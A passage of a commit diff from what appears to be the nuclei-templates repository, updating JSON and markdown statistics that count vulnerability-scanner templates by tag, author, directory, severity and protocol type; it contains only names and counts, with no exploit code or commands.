(mah3sec_)","count":2},{"name":"pxmme1337","count":2},{"name":"rafaelwdornelas","count":2},{"name":"nuk3s3c","count":2},{"name":"gevakun","count":2},{"name":"socketz","count":2},{"name":"k11h-de","count":2},{"name":"martincodes-de","count":2},{"name":"luci","count":2},{"name":"g4l1t0","count":2},{"name":"ambassify","count":2},{"name":"uomogrande","count":2},{"name":"0xelkomy","count":2},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"pascalheidmann","count":1},{"name":"rotemreiss","count":1},{"name":"viondexd","count":1},{"name":"jeya seelan","count":1},{"name":"akash.c","count":1},{"name":"sak1","count":1},{"name":"tea","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"luskabol","count":1},{"name":"justmumu","count":1},{"name":"hexcat","count":1},{"name":"dievus","count":1},{"name":"piyushchhiroliya","count":1},{"name":"open-sec","count":1},{"name":"pry0cc","count":1},{"name":"s0obi","count":1},{"name":"megamansec","count":1},{"name":"kishore-hariram","count":1},{"name":"ggranjus","count":1},{"name":"hakimkt","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"affix","count":1},{"name":"sherlocksecurity","count":1},{"name":"thevillagehacker","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"kiks7","count":1},{"name":"wabafet","count":1},{"name":"udyz","count":1},{"name":"alevsk","count":1},{"name":"erethon","count":1},{"name":"revblock","count":1},{"name":"pdp","count":1},{"name":"davidfegyver","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"narluin","count":1},{"name":"marcos_iaf","count":1},{"name":"manasmbellani","count":1},{"name":"anon-artist","count":1},{"name":"w0tx","count":1},{"name":"realexp3rt","count":1},{"name":"elmahdi","count":1},{"name":"retr02332","count":1},{"name":"oscarintherocks","count":1},{"name":"jna1","count":1},{"name":"djoevanka","count":1},{"name":"0xrod","count":1},{"name":"kiransau","count":1},{"name":"paper-pen","count":1},{"name":"thebinitghimire","count":1},{"name":"miryangjung","count":1},{"name":"bughuntersurya","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"rojanrijal","count":1},{"name":"iphantasmic","count":1},{"name":"official_blackhat13","count":1},{"name":"akshansh","count":1},{"name":"hanlaomo","count":1},{"name":"philippdelteil","count":1},{"name":"0xh7ml","count":1},{"name":"mubassirpatel","count":1},{"name":"juicypotato1","count":1},{"name":"ohlinge","count":1},{"name":"liquidsec","count":1},{"name":"tim_koopmans","count":1},{"name":"shreyapohekar","count":1},{"name":"alexrydzak","count":1},{"name":"arall","count":1},{"name":"igibanez","count":1},{"name":"deena","count":1},{"name":"rodnt","count":1},{"name":"becivells","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"noamrathaus","count":1},{"name":"majidmc2","count":1},{"name":"duty_1g","count":1},{"name":"retr0","count":1},{"name":"lingtren","count":1},{"name":"sickwell","count":1},{"name":"kurohost","count":1},{"name":"5up3r541y4n","count":1},{"name":"shelld3v","count":1},{"name":"droberson","count":1},{"name":"lamscun","count":1},{"name":"allenwest24","count":1},{"name":"sicksec","count":1},{"name":"af001","count":1},{"name":"s1r1u5_","count":1},{"name":"yuansec","count":1},{"name":"sinkettu","count":1},{"name":"harshinsecurity","count":1},{"name":"zinminphy0","count":1},{"name":"shockwave","count":1},{"name":"amanrawat","count":1},{"name":"fmunozs","count":1},{"name":"furkansayim","count":1},{"name":"tirtha","count":1},{"name":"zsusac","count":1},{"name":"mah3sec_","count":1},{"name":"jiheon-dev","count":1},{"name":"0xceeb","count":1},{"name":"streetofhackerr007","count":1},{"name":"makyotox","count":1},{"name":"8authur","count":1},{"name":"b0yd","count":1},{"name":"evan rubinstien","count":1},{"name":"alperenkesk","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"bad5ect0r","count":1},{"name":"micha3lb3n","count":1},{"name":"maximus decimus","count":1},{"name":"y0no","count":1},{"name":"queencitycyber","count":1},{"name":"mhdsamx","count":1},{"name":"kailashbohara","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"flag007","count":1},{"name":"ola456","count":1},{"name":"qlkwej","count":1},{"name":"coldfish","count":1},{"name":"exid","count":1},{"name":"nagli","count":1},{"name":"gboddin","count":1},{"name":"ph33rr","count":1},{"name":"phyr3wall","count":1},{"name":"ptonewreckin","count":1},{"name":"act1on3","count":1},{"name":"xshuden","count":1},{"name":"0h1in9e","count":1},{"name":"0xtavian","count":1},{"name":"jas37","count":1},{"name":"ringo","count":1},{"name":"patralos","count":1},{"name":"breno_css","count":1},{"name":"viniciuspereiras","count":1},{"name":"bartu utku sarp","count":1},{"name":"fopina","count":1},{"name":"ilovebinbash","count":1},{"name":"mrcl0wnlab","count":1},{"name":"kabirsuda","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"1nf1n7y","count":1},{"name":"xeldax","count":1},{"name":"ling","count":1},{"name":"ldionmarcil","count":1},{"name":"skylark-lab","count":1},{"name":"husain","count":1},{"name":"iampritam","count":1},{"name":"theabhinavgaur","count":1},{"name":"kareemse1im","count":1},{"name":"fq_hsu","count":1},{"name":"httpvoid","count":1},{"name":"jrolf","count":1},{"name":"vzamanillo","count":1},{"name":"geraldino2","count":1},{"name":"alex","count":1},{"name":"notnotnotveg","count":1},{"name":"florianmaak","count":1},{"name":"yashgoti","count":1},{"name":"xstp","count":1},{"name":"wlayzz","count":1},{"name":"aringo","count":1},{"name":"2rs3c","count":1},{"name":"ahmetpergamum","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"pratik khalane","count":1},{"name":"kr1shna4garwal","count":1},{"name":"secthebit","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"shifacyclewla","count":1},{"name":"nobody","count":1},{"name":"infosecsanyam","count":1},{"name":"bjhulst","count":1},{"name":"knassar702","count":1},{"name":"udinchan","count":1},{"name":"jeya.seelan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"0xteles","count":1},{"name":"furkansenan","count":1},{"name":"chron0x","count":1},{"name":"evolutionsec","count":1},{"name":"exploitation","count":1},{"name":"ooooooo_q","count":1},{"name":"ok_bye_now","count":1},{"name":"sshell","count":1},{"name":"francescocarlucci","count":1},{"name":"intx0x80","count":1},{"name":"thelicato","count":1},{"name":"whynotke","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sec_hawk","count":1},{"name":"apt-mirror","count":1},{"name":"elitebaz","count":1},{"name":"co0nan","count":1},{"name":"opencirt","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"0xd0ff9","count":1},{"name":"ahmed sherif","count":1},{"name":"exceed","count":1},{"name":"toufik-airane","count":1},{"name":"natto97","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"aaronchen0","count":1},{"name":"regala_","count":1},{"name":"jbaines-r7","count":1},{"name":"charanrayudu","count":1},{"name":"unkl4b","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"aayush vishnoi","count":1},{"name":"nerrorsec","count":1},{"name":"mass0ma","count":1},{"name":"dk999","count":1},{"name":"carlosvieira","count":1},{"name":"momen eldawakhly","count":1},{"name":"ramkrishna sawant","count":1},{"name":"ofjaaah","count":1},{"name":"ahmed abou-ela","count":1},{"name":"screamy","count":1},{"name":"zandros0","count":1},{"name":"noraj","count":1},{"name":"lethargynavigator","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"pjborah","count":1},{"name":"hardik-rathod","count":1},{"name":"jcockhren","count":1},{"name":"compr00t","count":1},{"name":"dale clarke","count":1},{"name":"schniggie","count":1},{"name":"miroslavsotak","count":1},{"name":"rschio","count":1},{"name":"nytr0gen","count":1},{"name":"arr0way","count":1},{"name":"hakluke","count":1},{"name":"jteles","count":1},{"name":"borna nematzadeh","count":1},{"name":"amnotacat","count":1},{"name":"un-fmunozs","count":1},{"name":"f1she3","count":1},{"name":"tehtbl","count":1},{"name":"h4kux","count":1},{"name":"nielsing","count":1},{"name":"soyelmago","count":1},{"name":"clment cruchet","count":1},{"name":"shivampand3y","count":1},{"name":"notsoevilweasel","count":1},{"name":"b4uh0lz","count":1},{"name":"osamahamad","count":1},{"name":"luqman","count":1},{"name":"push4d","count":1},{"name":"izn0u","count":1},{"name":"calumjelrick","count":1},{"name":"prettyboyaaditya","count":1},{"name":"b0rn2r00t","count":1},{"name":"0ut0fb4nd","count":1},{"name":"lark lab","count":1},{"name":"0xceba","count":1},{"name":"_harleo","count":1},{"name":"remonsec","count":1},{"name":"ransomsec","count":1},{"name":"p-l-","count":1},{"name":"rotembar","count":1},{"name":"tirtha_mandal","count":1},{"name":"absshax","count":1},{"name":"arm!tage","count":1},{"name":"berkdusunur","count":1},{"name":"kaizensecurity","count":1},{"name":"jbertman","count":1},{"name":"x6263","count":1},{"name":"pudsec","count":1},{"name":"mantissts","count":1},{"name":"andirrahmani1","count":1},{"name":"_c0wb0y_","count":1},{"name":"petruknisme","count":1},{"name":"blckraven","count":1},{"name":"c3l3si4n","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dhiyaneshdki","count":1},{"name":"cookiehanhoan","count":1},{"name":"danigoland","count":1},{"name":"willd96","count":1},{"name":"lrtk-coder","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"failopen","count":1},{"name":"couskito","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"andysvints","count":1},{"name":"noobexploiter","count":1},{"name":"lixts","count":1},{"name":"yashanand155","count":1},{"name":"daviey","count":1},{"name":"shiar","count":1},{"name":"vinit989","count":1},{"name":"arjunchandarana","count":1},{"name":"aresx","count":1},{"name":"rubina119","count":1},{"name":"elder tao","count":1},{"name":"undefl0w","count":1},{"name":"bywalks","count":1},{"name":"elouhi","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"daffianfo","count":1}],"directory":[{"name":"cves","count":1516},{"name":"exposed-panels","count":757},{"name":"vulnerabilities","count":518},{"name":"misconfiguration","count":350},{"name":"technologies","count":311},{"name":"exposures","count":301},{"name":"token-spray","count":235},{"name":"workflows","count":190},{"name":"default-logins","count":114},{"name":"file","count":78},{"name":"takeovers","count":68},{"name":"network","count":59},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1631},{"name":"high","count":1141},{"name":"medium","count":829},{"name":"critical","count":546},{"name":"low","count":269},{"name":"unknown","count":25}],"types":[{"name":"http","count":4257},{"name":"file","count":78},{"name":"network","count":73},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index e0bfa1f808..a69ef4baec 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,2196 +1,2222 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | -| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | -| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | -| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | -| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | -| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | -| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | -| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | -| rce | 343 | princechaddha | 153 | file | 77 | | | | | -| tech | 319 | gy741 | 134 | takeovers | 68 | | | | | -| packetstorm | 291 | arafatansari | 102 | network | 56 | | | | | -| cve2022 | 255 | tess | 74 | iot | 40 | | | | | -| wpscan | 247 | madrobot | 65 | cnvd | 25 | | | | | +| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | +| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | +| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | +| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | +| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | +| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | +| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | +| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | +| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | +| tech | 349 | princechaddha | 153 | file | 78 | | | | | +| rce | 345 | gy741 | 135 | takeovers | 68 | | | | | +| packetstorm | 291 | arafatansari | 102 | network | 59 | | | | | +| cve2022 | 262 | tess | 82 | iot | 41 | | | | | +| wpscan | 252 | madrobot | 65 | cnvd | 25 | | | | | | token-spray | 235 | zzeitlin | 64 | miscellaneous | 25 | | | | | -| cve2020 | 217 | idealphase | 61 | dns | 17 | | | | | -| misconfig | 212 | akincibor | 51 | fuzzing | 12 | | | | | -| | 195 | for3stco1d | 47 | ssl | 8 | | | | | -| unauth | 188 | gaurang | 42 | headless | 7 | | | | | -| wp | 177 | philippedelteil | 36 | | | | | | | -| kev | 167 | adam crosser | 31 | | | | | | | -| config | 162 | edoardottt | 28 | | | | | | | -| cve2018 | 145 | ice3man | 26 | | | | | | | -| cve2019 | 137 | c-sh0 | 26 | | | | | | | -| joomla | 135 | theamanrawat | 26 | | | | | | | -| default-login | 129 | organiccrap | 24 | | | | | | | -| oast | 127 | ffffffff0x | 22 | | | | | | | -| apache | 124 | righettod | 22 | | | | | | | -| iot | 122 | techbrunchfr | 21 | | | | | | | -| authenticated | 117 | cckuailong | 18 | | | | | | | -| cve2010 | 111 | sullo | 17 | | | | | | | -| sqli | 111 | sheikhrishad | 15 | | | | | | | -| router | 90 | pr3r00t | 15 | | | | | | | -| redirect | 89 | milo2012 | 14 | | | | | | | +| misconfig | 221 | idealphase | 61 | dns | 17 | | | | | +| cve2020 | 221 | akincibor | 51 | fuzzing | 12 | | | | | +| | 195 | for3stco1d | 48 | ssl | 8 | | | | | +| unauth | 194 | gaurang | 42 | headless | 7 | | | | | +| wp | 182 | philippedelteil | 36 | | | | | | | +| kev | 167 | edoardottt | 34 | | | | | | | +| config | 163 | theamanrawat | 31 | | | | | | | +| cve2018 | 145 | adam crosser | 31 | | | | | | | +| cve2019 | 137 | ice3man | 26 | | | | | | | +| joomla | 135 | c-sh0 | 26 | | | | | | | +| default-login | 130 | organiccrap | 24 | | | | | | | +| oast | 127 | righettod | 23 | | | | | | | +| apache | 126 | ffffffff0x | 22 | | | | | | | +| iot | 123 | techbrunchfr | 21 | | | | | | | +| authenticated | 118 | cckuailong | 18 | | | | | | | +| sqli | 115 | sullo | 17 | | | | | | | +| cve2010 | 111 | pr3r00t | 15 | | | | | | | +| router | 90 | sheikhrishad | 15 | | | | | | | +| redirect | 90 | milo2012 | 14 | | | | | | | | files | 89 | r3dg33k | 14 | | | | | | | -| login | 88 | sharath | 13 | | | | | | | -| devops | 75 | johnk3r | 13 | | | | | | | -| takeover | 74 | 0ri2n | 13 | | | | | | | -| token | 73 | tenbird | 13 | | | | | | | -| network | 73 | random-robbie | 12 | | | | | | | -| ssrf | 72 | suman_kar | 12 | | | | | | | -| cve2017 | 70 | melbadry9 | 12 | | | | | | | +| login | 88 | tenbird | 13 | | | | | | | +| network | 76 | johnk3r | 13 | | | | | | | +| devops | 75 | sharath | 13 | | | | | | | +| takeover | 74 | random-robbie | 13 | | | | | | | +| token | 74 | 0ri2n | 13 | | | | | | | +| ssrf | 72 | melbadry9 | 12 | | | | | | | +| cve2017 | 70 | suman_kar | 12 | | | | | | | | cms | 67 | dogasantos | 11 | | | | | | | -| auth-bypass | 64 | elsfa7110 | 11 | | | | | | | -| file | 63 | cyllective | 11 | | | | | | | -| oracle | 62 | wdahlenb | 11 | | | | | | | -| intrusive | 59 | nadino | 10 | | | | | | | -| install | 57 | meme-lord | 10 | | | | | | | -| seclists | 56 | random_robbie | 10 | | | | | | | -| disclosure | 54 | hackergautam | 10 | | | | | | | -| cisco | 49 | logicalhunter | 10 | | | | | | | -| cve2016 | 49 | alph4byt3 | 10 | | | | | | | -| oss | 49 | emadshanab | 9 | | | | | | | -| google | 48 | oppsec | 9 | | | | | | | -| cve2015 | 47 | 0x240x23elu | 9 | | | | | | | -| fileupload | 47 | that_juan_ | 8 | | | | | | | -| adobe | 45 | veshraj | 8 | | | | | | | -| aem | 42 | lu4nx | 8 | | | | | | | -| plugin | 41 | zh | 8 | | | | | | | -| cve2014 | 41 | aashiq | 8 | | | | | | | -| vulhub | 38 | iamthefrogy | 8 | | | | | | | -| atlassian | 38 | leovalcante | 7 | | | | | | | -| vmware | 38 | caspergn | 7 | | | | | | | +| file | 65 | elsfa7110 | 11 | | | | | | | +| auth-bypass | 65 | wdahlenb | 11 | | | | | | | +| oracle | 62 | cyllective | 11 | | | | | | | +| intrusive | 59 | logicalhunter | 10 | | | | | | | +| install | 58 | alph4byt3 | 10 | | | | | | | +| seclists | 57 | nadino | 10 | | | | | | | +| disclosure | 56 | random_robbie | 10 | | | | | | | +| oss | 51 | meme-lord | 10 | | | | | | | +| cve2016 | 49 | hackergautam | 10 | | | | | | | +| cisco | 49 | oppsec | 9 | | | | | | | +| google | 48 | 0x240x23elu | 9 | | | | | | | +| fileupload | 47 | emadshanab | 9 | | | | | | | +| cve2015 | 47 | lu4nx | 8 | | | | | | | +| adobe | 45 | iamthefrogy | 8 | | | | | | | +| aem | 42 | veshraj | 8 | | | | | | | +| cve2014 | 41 | that_juan_ | 8 | | | | | | | +| plugin | 41 | aashiq | 8 | | | | | | | +| atlassian | 38 | zh | 8 | | | | | | | +| vmware | 38 | kophjager007 | 7 | | | | | | | +| vulhub | 38 | divya_mudgal | 7 | | | | | | | | logs | 37 | dr_set | 7 | | | | | | | -| traversal | 35 | randomstr1ng | 7 | | | | | | | -| tenable | 35 | techryptic (@tech) | 7 | | | | | | | -| springboot | 35 | amit-jd | 7 | | | | | | | -| injection | 33 | kophjager007 | 7 | | | | | | | -| hackerone | 33 | harshbothra_ | 7 | | | | | | | -| jira | 32 | divya_mudgal | 7 | | | | | | | -| listing | 31 | __fazal | 6 | | | | | | | -| kubernetes | 29 | _0xf4n9x_ | 6 | | | | | | | -| huntr | 29 | gitlab red team | 6 | | | | | | | -| generic | 28 | rootxharsh | 6 | | | | | | | -| dns | 27 | ricardomaia | 6 | | | | | | | -| debug | 26 | imnightmaree | 6 | | | | | | | -| log4j | 26 | nullfuzz | 6 | | | | | | | -| cnvd | 25 | evan rubinstein | 6 | | | | | | | -| sap | 25 | pentest_swissky | 6 | | | | | | | -| microsoft | 24 | forgedhallpass | 6 | | | | | | | -| jndi | 23 | puzzlepeaches | 6 | | | | | | | -| misc | 23 | iamnoooob | 6 | | | | | | | -| proxy | 23 | pathtaga | 6 | | | | | | | -| php | 22 | praetorian-thendrickson | 6 | | | | | | | -| aws | 22 | yanyun | 5 | | | | | | | -| manageengine | 21 | clem9669 | 5 | | | | | | | -| zoho | 21 | joanbono | 5 | | | | | | | -| wp-theme | 21 | podalirius | 5 | | | | | | | -| fuzz | 21 | nodauf | 5 | | | | | | | -| cve2012 | 20 | xelkomy | 5 | | | | | | | -| weblogic | 20 | ganofins | 5 | | | | | | | -| cloud | 20 | prajiteshsingh | 5 | | | | | | | -| api | 19 | panch0r3d | 5 | | | | | | | -| cicd | 19 | scent2d | 4 | | | | | | | -| camera | 19 | wisnupramoedya | 4 | | | | | | | +| springboot | 35 | randomstr1ng | 7 | | | | | | | +| tenable | 35 | harshbothra_ | 7 | | | | | | | +| traversal | 35 | amit-jd | 7 | | | | | | | +| hackerone | 34 | caspergn | 7 | | | | | | | +| injection | 33 | techryptic (@tech) | 7 | | | | | | | +| jira | 32 | leovalcante | 7 | | | | | | | +| listing | 31 | _0xf4n9x_ | 6 | | | | | | | +| debug | 30 | puzzlepeaches | 6 | | | | | | | +| huntr | 29 | pentest_swissky | 6 | | | | | | | +| kubernetes | 29 | nullfuzz | 6 | | | | | | | +| generic | 28 | evan rubinstein | 6 | | | | | | | +| dns | 27 | praetorian-thendrickson | 6 | | | | | | | +| log4j | 26 | imnightmaree | 6 | | | | | | | +| cnvd | 25 | pathtaga | 6 | | | | | | | +| microsoft | 25 | forgedhallpass | 6 | | | | | | | +| sap | 25 | __fazal | 6 | | | | | | | +| jndi | 23 | gitlab red team | 6 | | | | | | | +| proxy | 23 | ricardomaia | 6 | | | | | | | +| misc | 23 | rootxharsh | 6 | | | | | | | +| aws | 22 | iamnoooob | 6 | | | | | | | +| php | 22 | podalirius | 5 | | | | | | | +| wp-theme | 21 | xelkomy | 5 | | | | | | | +| zoho | 21 | yanyun | 5 | | | | | | | +| manageengine | 21 | nodauf | 5 | | | | | | | +| fuzz | 21 | panch0r3d | 5 | | | | | | | +| weblogic | 20 | prajiteshsingh | 5 | | | | | | | +| cve2012 | 20 | ganofins | 5 | | | | | | | +| cloud | 20 | joanbono | 5 | | | | | | | +| tomcat | 19 | clem9669 | 5 | | | | | | | +| cicd | 19 | 0xlittleboy | 4 | | | | | | | +| k8s | 19 | dadevel | 4 | | | | | | | +| ibm | 19 | tanq16 | 4 | | | | | | | +| camera | 19 | incogbyte | 4 | | | | | | | +| api | 19 | r3naissance | 4 | | | | | | | | deserialization | 19 | dolev farhi | 4 | | | | | | | -| k8s | 19 | r3naissance | 4 | | | | | | | -| ibm | 19 | h1ei1 | 4 | | | | | | | -| tomcat | 19 | 0xlittleboy | 4 | | | | | | | -| gitlab | 18 | incogbyte | 4 | | | | | | | -| service | 18 | defr0ggy | 4 | | | | | | | -| dlink | 18 | tanq16 | 4 | | | | | | | -| wavlink | 17 | e_schultze_ | 4 | | | | | | | -| firewall | 17 | robotshell | 4 | | | | | | | -| jenkins | 17 | 3th1c_yuk1 | 4 | | | | | | | -| ftp | 17 | dadevel | 4 | | | | | | | -| printer | 16 | its0x08 | 4 | | | | | | | -| struts | 16 | atomiczsec | 3 | | | | | | | -| cve2011 | 15 | hahwul | 3 | | | | | | | -| nginx | 15 | lark-lab | 3 | | | | | | | -| xxe | 15 | skeltavik | 3 | | | | | | | -| cve2009 | 15 | ekrause | 3 | | | | | | | -| fortinet | 14 | shine | 3 | | | | | | | -| hp | 14 | 0w4ys | 3 | | | | | | | -| domainmod | 14 | andydoering | 3 | | | | | | | -| msf | 14 | mr-xn | 3 | | | | | | | -| android | 14 | lucasljm2001 | 3 | | | | | | | -| java | 14 | fyoorer | 3 | | | | | | | -| amazon | 13 | sushantkamble | 3 | | | | | | | -| cve2013 | 13 | _generic_human_ | 3 | | | | | | | -| status | 13 | yash anand @yashanand155 | 3 | | | | | | | -| confluence | 13 | ph33r | 3 | | | | | | | -| magento | 13 | splint3r7 | 3 | | | | | | | -| abstractapi | 13 | unstabl3 | 3 | | | | | | | -| lfr | 13 | impramodsargar | 3 | | | | | | | -| woocommerce | 13 | emenalf | 3 | | | | | | | -| netsweeper | 12 | kh4sh3i | 3 | | | | | | | -| rails | 12 | powerexploit | 3 | | | | | | | -| graphql | 12 | me9187 | 3 | | | | | | | -| drupal | 12 | dudez | 3 | | | | | | | -| ruijie | 12 | f1tz | 3 | | | | | | | -| backup | 12 | whoever | 3 | | | | | | | -| netgear | 12 | supras | 3 | | | | | | | -| cve2008 | 12 | binaryfigments | 3 | | | | | | | -| microweber | 12 | fxploit | 3 | | | | | | | -| airflow | 11 | davidmckennirey | 3 | | | | | | | -| vpn | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| cisa | 11 | jarijaas | 3 | | | | | | | -| webserver | 11 | swissky | 3 | | | | | | | -| azure | 11 | alifathi-h1 | 3 | | | | | | | -| cnvd2021 | 11 | johnjhacking | 3 | | | | | | | -| ssl | 11 | z3bd | 3 | | | | | | | -| fortigate | 11 | arcc | 3 | | | | | | | -| backdoor | 11 | dr0pd34d | 3 | | | | | | | -| github | 11 | thomas_from_offensity | 3 | | | | | | | -| grafana | 10 | shifacyclewala | 3 | | | | | | | -| git | 10 | mavericknerd | 3 | | | | | | | -| ruby | 10 | joeldeleep | 2 | | | | | | | -| dell | 10 | fabaff | 2 | | | | | | | -| glpi | 10 | pxmme1337 | 2 | | | | | | | -| jolokia | 10 | brenocss | 2 | | | | | | | -| zyxel | 10 | 0xcrypto | 2 | | | | | | | -| django | 10 | bananabr | 2 | | | | | | | -| laravel | 10 | moritz nentwig | 2 | | | | | | | -| coldfusion | 10 | hetroublemakr | 2 | | | | | | | -| spring | 10 | geekby | 2 | | | | | | | -| kube | 9 | dbrwsky | 2 | | | | | | | -| wso2 | 9 | w4cky_ | 2 | | | | | | | -| dedecms | 9 | kiblyn11 | 2 | | | | | | | -| prometheus | 9 | korteke | 2 | | | | | | | -| zimbra | 9 | nuk3s3c | 2 | | | | | | | -| iis | 9 | ehsahil | 2 | | | | | | | -| vcenter | 9 | redteambrasil | 2 | | | | | | | -| fastjson | 9 | 0xelkomy | 2 | | | | | | | -| sonicwall | 9 | smaranchand | 2 | | | | | | | -| zabbix | 9 | udit_thakkur | 2 | | | | | | | -| ssti | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| phpmyadmin | 9 | parth | 2 | | | | | | | -| windows | 9 | ree4pwn | 2 | | | | | | | -| hms | 8 | ambassify | 2 | | | | | | | -| kafka | 8 | israel comazzetto dos reis | 2 | | | | | | | -| mail | 8 | gevakun | 2 | | | | | | | -| citrix | 8 | amsda | 2 | | | | | | | -| auth | 8 | github.com/its0x08 | 2 | | | | | | | -| recon | 8 | badboycxcc | 2 | | | | | | | -| elasticsearch | 8 | myztique | 2 | | | | | | | -| audit | 8 | socketz | 2 | | | | | | | -| solr | 8 | 0xsapra | 2 | | | | | | | -| metadata | 8 | paradessia | 2 | | | | | | | -| mirai | 8 | ajaysenr | 2 | | | | | | | -| jboss | 8 | 0xnirvana | 2 | | | | | | | -| headless | 8 | uomogrande | 2 | | | | | | | -| scada | 8 | canberbamber | 2 | | | | | | | -| cisco-switch | 8 | martincodes-de | 2 | | | | | | | -| config-audit | 8 | rafaelwdornelas | 2 | | | | | | | -| jetbrains | 7 | d4vy | 2 | | | | | | | -| icewarp | 7 | evergreencartoons | 2 | | | | | | | -| bucket | 7 | luci | 2 | | | | | | | -| seeyon | 7 | kre80r | 2 | | | | | | | -| maps | 7 | hackerarpan | 2 | | | | | | | -| ssh | 7 | danielmofer | 2 | | | | | | | -| exchange | 7 | thezakman | 2 | | | | | | | -| squirrelmail | 7 | dahse89 | 2 | | | | | | | -| druid | 7 | huowuzhao | 2 | | | | | | | -| blind | 7 | thardt-praetorian | 2 | | | | | | | -| npm | 7 | joshlarsen | 2 | | | | | | | -| docker | 7 | 0xprial | 2 | | | | | | | -| solarview | 7 | bernardofsr | 2 | | | | | | | -| python | 7 | bp0lr | 2 | | | | | | | -| symfony | 7 | mohammedsaneem | 2 | | | | | | | -| cnvd2020 | 7 | raesene | 2 | | | | | | | -| firebase | 7 | cckuakilong | 2 | | | | | | | -| opencats | 7 | lotusdll | 2 | | | | | | | -| go | 7 | n-thumann | 2 | | | | | | | -| samsung | 7 | y4er | 2 | | | | | | | -| nodejs | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| fpd | 6 | zomsop82 | 2 | | | | | | | -| bigip | 6 | codexlynx | 2 | | | | | | | -| emerge | 6 | nkxxkn | 2 | | | | | | | -| moodle | 6 | true13 | 2 | | | | | | | -| db | 6 | vavkamil | 2 | | | | | | | -| websphere | 6 | randomrobbie | 2 | | | | | | | -| liferay | 6 | 666asd | 2 | | | | | | | -| magmi | 6 | koti2 | 2 | | | | | | | -| ofbiz | 6 | sbani | 2 | | | | | | | -| vms | 6 | g4l1t0 | 2 | | | | | | | -| enum | 6 | k11h-de | 2 | | | | | | | -| sitecore | 6 | convisoappsec | 2 | | | | | | | -| microstrategy | 6 | dheerajmadhukar | 2 | | | | | | | -| zhiyuan | 6 | manas_harsh | 2 | | | | | | | -| artica | 6 | 0xrudra | 2 | | | | | | | -| ognl | 6 | cocxanh | 2 | | | | | | | -| huawei | 6 | ricardo maia (brainfork) | 2 | | | | | | | -| slack | 6 | v0idc0de | 2 | | | | | | | -| kubelet | 6 | 0xsmiley | 2 | | | | | | | -| opensis | 6 | r12w4n | 2 | | | | | | | -| openvpn | 6 | bsysop | 2 | | | | | | | -| setup | 6 | vsh00t | 2 | | | | | | | -| lucee | 6 | clarkvoss | 2 | | | | | | | -| jamf | 6 | sy3omda | 2 | | | | | | | -| crlf | 6 | taielab | 2 | | | | | | | -| ecology | 6 | bing0o | 2 | | | | | | | -| jetty | 6 | x1m_martijn | 2 | | | | | | | -| bypass | 6 | afaq | 2 | | | | | | | -| activemq | 6 | 8arthur | 2 | | | | | | | -| rconfig | 6 | gal nagli | 2 | | | | | | | -| cobbler | 6 | paperpen | 2 | | | | | | | -| fatpipe | 5 | nvn1729 | 2 | | | | | | | -| avideo | 5 | z0ne | 2 | | | | | | | -| rseenet | 5 | foulenzer | 2 | | | | | | | -| symantec | 5 | blckraven | 1 | | | | | | | -| carrental | 5 | orpheus | 1 